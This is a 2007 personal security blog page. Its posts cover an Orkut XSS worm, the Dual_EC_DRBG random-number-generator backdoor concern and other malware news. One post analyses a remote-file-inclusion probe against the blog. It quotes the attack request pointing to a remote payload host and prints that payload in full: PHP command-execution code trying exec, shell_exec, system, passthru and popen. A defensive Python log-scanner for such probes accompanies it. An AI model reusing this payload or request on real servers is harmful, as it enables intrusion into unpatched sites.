December 2007


… and not much is happening.

Got my Flickr account up though. Feel free to have a look.

French Bulldog Ruby looking for her next adventure

Cheers,

Seems like Orkut (the Google social networking site) got hit with a pretty nasty XSS worm.

It did not do anything malicious (fortunately) to the users whose profiles were infected, but it probably caused quite a high load on the Orkut systems and joined all infected users into a group called “Infectados pelo Vírus do Orkut”.

The description of that particular group explained the motivation for the hack; the main point seems to be to illustrate how insecure web applications such as Orkut are.

For more information, including source code for the virus, see: Antrix.net or GNUCITIZEN’s posts on the subject.

These kinds of issues are raising serious concerns over services such as “Google Docs” (online office applications) and the upcoming gDrive, and one might pose the question:

Do you trust Google with your data?

** Update **

More reading regarding this incident:

Sylvan von Stuppe - Orkut Worm
Arbor Networks - Orkut XSS Worm
SophosLabs - Large scale Orkut virus outbreak not cool
TrendMicro - Orkut/Google worms Compromise over 400,000 accounts

Cheers,

… reported by Dan Shumow and Niels Ferguson about 4 months ago?

I did a quick post about it here after reading about it at Bruce Schneier’s blog.

The problem is that the NSA submitted an elliptic-curve based algorithm for inclusion in a new NIST standard for random number generation, and that algorithm contains certain constant values whose origin is unknown. That might not sound important, but as discovered earlier it opens up the possibility of a “secret key”: whoever chose the constants could predict the generator's output and thereby unlock data encrypted with it. The fact that the NSA submitted this (much slower than the others) algorithm also helps stir up the crypto community.

Not much had been reported on the issue since, until yesterday (by Schneier again).

The big news is that the flawed PRNG is to be shipped with SP1 for Windows Vista. It is not going to be the default PRNG, but it is still going to be included as an option to developers.

Why is this a problem? Well,

First, you are damn sure going to have to look real close at any application you employ to secure your data, as you are in the hands of the application's developers. More or less, you will have to request the source code if you really want to be sure, and even then it can be a real hassle to find any references to the offending algorithm.

Second, why did they implement an algorithm whose flaw was found by their own analysts? Yes, Dan Shumow and Niels Ferguson are employed by Microsoft. Especially as they have been urgently patching other PRNG flaws in their OSes recently. Some say this is to meet the whole NIST standard, but come on, who would implement a crypto technology that is flawed? I mean, that kind of breaks the whole idea of cryptography in the first place.

Third, what if Microsoft issues a patch or security update which silently makes Dual_EC_DRBG the default PRNG? Then all your data could be read by “someone”. Do you trust MS? This leads me to the…

Final point. Who has the skeleton key? NSA? Microsoft? Someone else?

On the 11th of December (04:17:52) I received the following request to this site:

"GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1"

Looks like someone is trying to exploit an RFI (remote file inclusion) vulnerability in Pearl for Mambo. This particular issue was disclosed over a year ago and they are still scanning for it… Must be a lot of unpatched fish in the internet tubes…
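Requests like the one above are easy to pick out of a web server log. The following is an added example (not code from the original post): it parses Apache "combined" format lines and flags query parameters whose value is a remote URL with the corroborating signs seen in that request. The log lines are constructed here; only the first request line is the one quoted in the post.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample in Apache "combined" format (not this blog's real log); the first
# request line is the one quoted in the post, the rest are benign or other probes.
SAMPLE_LOG = """\
80.237.200.81 - - [11/Dec/2007:04:17:52 +0100] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
192.0.2.10 - - [11/Dec/2007:04:20:01 +0100] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.11 - - [11/Dec/2007:04:21:13 +0100] "GET /index.php?page=ftp://198.51.100.7/shell.txt? HTTP/1.0" 404 300 "-" "libwww-perl/5.805"
192.0.2.12 - - [11/Dec/2007:04:22:45 +0100] "GET /redirect.php?url=http://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Parameter names that typically end up in include()/require() in PHP applications.
INCLUDE_HINT = re.compile(r"dir|path|page|file|include|template|config|root|lib", re.I)

def find_rfi_attempts(log_text):
    """Return one finding per query parameter whose value looks like a remote include."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line we can parse; skip rather than guess
        path, _, query = m.group("target").partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            if not value.lower().startswith(REMOTE_SCHEMES):
                continue  # a URL-valued parameter alone (e.g. a redirect target) is not enough
            reasons = []
            if INCLUDE_HINT.search(name):
                reasons.append("include-style parameter name")
            if value.endswith("?"):
                # A trailing '?' turns whatever the application appends into the remote
                # URL's query string instead of its path: a hallmark of RFI probes.
                reasons.append("trailing '?' to neutralise an appended suffix")
            if re.search(r"\.(txt|gif|jpe?g|png)\b", value, re.I):
                # Hosted as .txt/image so the attacker's own server serves the PHP source unexecuted.
                reasons.append("PHP source behind a non-script extension")
            if reasons:
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
                                 "param": name, "url": value, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f"{f['ip']} {f['ts']} {f['path']} {f['param']} -> {f['url']} ({'; '.join(f['reasons'])})")
```

The redirect line is deliberately left unflagged: a URL in a parameter is normal for some applications, so the check only fires when at least one of the RFI-specific signals is also present.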

The file that is supposed to be included is live and contains the following:

echo "549821347819481<br>";   // marker the scanner looks for in the response to confirm the include worked
$cmd="id";
$eseguicmd=ex($cmd);          // run `id` on the victim and print the result
echo $eseguicmd."<br>";
function ex($cfe){            // tries each PHP command-execution function in turn until one is available;
    $res = '';                // every call is @-suppressed so nothing shows up in the PHP error log
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;

The attacking host was:

80.237.200.81 (jam.seppenra.de)
Windows CE, Generic Gecko
Cologne, Germany, DE, 50.9333, 6.95
Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007

What about doing some error checking to verify that the target actually contains the vulnerable code? It doesn’t take much time and seems like a reasonable thing to do if you want to stay (at least a little bit) under the radar.

Anyhow, this gave me a good idea which I will present in a future post.

All involved system owners have been notified.

Refreshing!

with an old, erroneous, destructive piece of malware.

LiveDeath, heh

You just don’t see many of these in this day and age. Deleting the files on the C:\ drive and everything ;)

I wonder how long this has been floating around before we picked it up…

…with my WordPress setup. Hence the lack of updates. Hopefully it’ll work from now on ;)

Shouldn’t blame it all on the crazy WYSIWYG editor though, as I’m also quite busy studying for my CISSP cert. Going to take the exam in 6 months so I have some reading to do.

In other news,

Symantec has discovered a malware distributor using the unpatched QuickTime RTSP vulnerability. This is a big deal, as it is very easily exploited on the client and there is no patch in sight. To mitigate the issue you might want to block the RTSP traffic it relies on and review your browser’s security settings.

Also, we are still waiting for the WPAD issue to be fixed by Microsoft, but this is not as serious, as it only affects a limited number of “incorrectly configured” (maybe not the most correct description) clients.

F-Secure reported the first “Christmas greeting” malware they’ve received this year. Doesn’t seem to be a very inspiring payload, but it might evolve a bit when we get closer to the main event ;)

That’s all for this post. Cheers and have a nice Monday!